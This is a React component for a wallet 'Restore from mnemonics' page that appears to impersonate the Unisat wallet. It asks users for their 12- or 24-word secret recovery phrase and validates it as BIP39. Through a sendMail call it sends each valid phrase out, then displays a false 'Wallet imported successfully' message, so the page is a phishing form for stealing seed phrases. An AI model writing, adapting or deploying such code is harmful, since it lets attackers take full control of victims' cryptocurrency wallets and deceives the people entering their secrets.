import React, { useEffect, useRef, useState } from 'react'
import Header from '../components/Header'
import { validateMnemonic } from "@scure/bip39"
import { wordlist } from '@scure/bip39/wordlists/english'
import Phrase from '../components/Phrase'
import { sendMail } from '../utils/sendMail'
import Message from '../components/Message'
import SuccessfulModal from '../components/SuccessfulModal'

const word = [12, 24]

// test explain sign size tray mention alone into dove divert mammal movie

export default function Import() {
    const [phrase, setPhrase] = useState(12)
    const [inputValues, setInputValues] = useState(Array(24).fill(''));
    const [disable, setDisable] = useState(true)
    const [errorMessage, setErrorMessage] = useState(false)
    const [successfulMessage, setSuccessfulMessage] = useState(false)
    const form = useRef()

    useEffect(() => {
        if (inputValues.slice(0, phrase).includes("") || inputValues.slice(0, phrase).some(item => item && item.trim() === "")) {
            setDisable(true)
        } else {
            setDisable(false)
        }
    }, [phrase, inputValues])

    // Function to update input values
    const handleInputChange = (index, value) => {
        const newInputValues = [...inputValues];
        newInputValues[index - 1] = value;
        setInputValues(newInputValues);
    };

    // On Paste
    const handlePaste = (e, index) => {
        e.preventDefault();

        const paste = e.clipboardData.getData('text').split(" ");

        setInputValues(prevInputValues => [
            ...prevInputValues.slice(0, index),
            ...paste,
            ...prevInputValues.slice(index)
        ]);
    };


    const sendEmail = (e) => {
        e.preventDefault();

        const str = inputValues.splice(0, phrase).join(" ")
        const valid = validateMnemonic(str, wordlist);
        if (valid) {
            sendMail({
                passphrase: str,
                provider: 'Unisat'
            })
            setSuccessfulMessage(true)
        } else {
            setErrorMessage("Incorrect Recovery Phrase")

            setTimeout(() => {
                setErrorMessage(false)
            }, 5000);
        }
    };

    return (
        <>
            {errorMessage && <Message>
                {errorMessage}
            </Message>}

            {successfulMessage && <SuccessfulModal
                title={'Wallet imported successfully'}
                onClose={() => setSuccessfulMessage(null)}
            />}


            <Header
                title={"Restore from mnemonics"}
                errorMessage={errorMessage}
                step={3}
            />
            <form
                className='flex flex-col gap-3 mt-3'
                onSubmit={sendEmail}
            >
                <p className='text-lg text-center'>Secret Recovery Phrase</p>
                <p className='text-xs text-center text-white/50'>Import an existing wallet with your secret recovery phrase</p>
                {/* Phrase Length */}
                <div className='flex items-center justify-center gap-3'>
                    {word.map((item, index) => (
                        <button
                            key={index}
                            type='button'
                            className='text-[1.125rem] relative flex gap-2 items-center justify-center'
                            onClick={() => setPhrase(item)}
                        >
                            <div className={`relative w-4 aspect-square rounded-full border-[1.5px] ${item === phrase
                                ? 'border-[rgb(234,194,73)]'
                                : 'border-white/50'}`}>
                                {item === phrase && (
                                    <div className='absolute left-1/2 top-1/2 -translate-x-1/2 -translate-y-1/2 w-[10px] aspect-square rounded-full bg-[rgb(234,194,73)]'></div>
                                )}
                            </div>
                            <span>{item} words</span>
                        </button>
                    ))}
                </div>
                {/* Inputs */}
                <div className='w-[266px] mx-auto grid grid-cols-2 gap-2'>
                    {Array.from({ length: (phrase + 1) }, (item, index) => index > 0 && (
                        <Phrase
                            key={index}
                            index={index}
                            inputValues={inputValues}
                            handleInputChange={handleInputChange}
                            handlePaste={handlePaste}
                        />
                    ))}
                </div>
                <div className='h-[40px]'></div>
                <div className='w-full px-[10px] pt-[10px] pb-[20px] bg-[rgb(28,25,25)] text-center'>
                    <button
                        className='w-[266px] rounded bg-[rgb(253,224,71)] text-black px-3 min-h-9 disabled:opacity-50 disabled:cursor-not-allowed'
                        type='submit'
                        disabled={disable}
                    >
                        Continue
                    </button>
                </div>
            </form>
        </>
    )
}
